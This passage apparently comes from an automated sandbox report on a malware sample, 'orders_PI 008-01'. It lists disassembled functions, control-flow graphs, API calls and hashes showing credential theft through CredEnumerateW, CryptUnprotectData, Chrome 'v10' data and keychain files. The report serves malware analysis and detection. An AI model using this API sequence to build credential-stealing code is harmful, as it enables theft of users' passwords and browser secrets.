                                        • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: InfoSystemmemset
                                        • String ID:
                                        • API String ID: 3558857096-0
                                        • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                        • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                        Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                        APIs
                                        • memset.MSVCRT ref: 004455C2
                                        • wcsrchr.MSVCRT ref: 004455DA
                                        • memset.MSVCRT ref: 0044570D
                                        • memset.MSVCRT ref: 00445725
                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                          • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                          • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                          • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                        • memset.MSVCRT ref: 0044573D
                                        • memset.MSVCRT ref: 00445755
                                        • memset.MSVCRT ref: 004458CB
                                        • memset.MSVCRT ref: 004458E3
                                        • memset.MSVCRT ref: 0044596E
                                        • memset.MSVCRT ref: 00445A10
                                        • memset.MSVCRT ref: 00445A28
                                        • memset.MSVCRT ref: 00445AC6
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                        • memset.MSVCRT ref: 00445B52
                                        • memset.MSVCRT ref: 00445B6A
                                        • memset.MSVCRT ref: 00445C9B
                                        • memset.MSVCRT ref: 00445CB3
                                        • _wcsicmp.MSVCRT ref: 00445D56
                                        • memset.MSVCRT ref: 00445B82
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                        • memset.MSVCRT ref: 00445986
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                        • API String ID: 1963886904-3798722523
                                        • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                        • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                        Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                          • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                        • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                        • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 2744995895-28296030
                                        • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                        • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                        Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040B71C
                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                        • wcsrchr.MSVCRT ref: 0040B738
                                        • memset.MSVCRT ref: 0040B756
                                        • memset.MSVCRT ref: 0040B7F5
                                        • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                        • memset.MSVCRT ref: 0040B851
                                        • memset.MSVCRT ref: 0040B8CA
                                        • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                        • memset.MSVCRT ref: 0040BB53
                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                        • String ID: chp$v10
                                        • API String ID: 1297422669-2783969131
                                        • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                        • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                        Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                        APIs
                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                        • free.MSVCRT ref: 0040E49A
                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                        • memset.MSVCRT ref: 0040E380
                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                        • wcschr.MSVCRT ref: 0040E3B8
                                        • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                        • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E407
                                        • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E422
                                        • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E43D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                        • API String ID: 3849927982-2252543386
                                        • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                        • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                        Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                        APIs
                                        • memset.MSVCRT ref: 004091E2
                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                        • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                        • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                        • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                        • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                        • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                        • String ID:
                                        • API String ID: 3715365532-3916222277
                                        • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                        • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                        Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                          • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                          • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                        • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                        • String ID: bhv
                                        • API String ID: 4234240956-2689659898
                                        • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                        • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                        Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
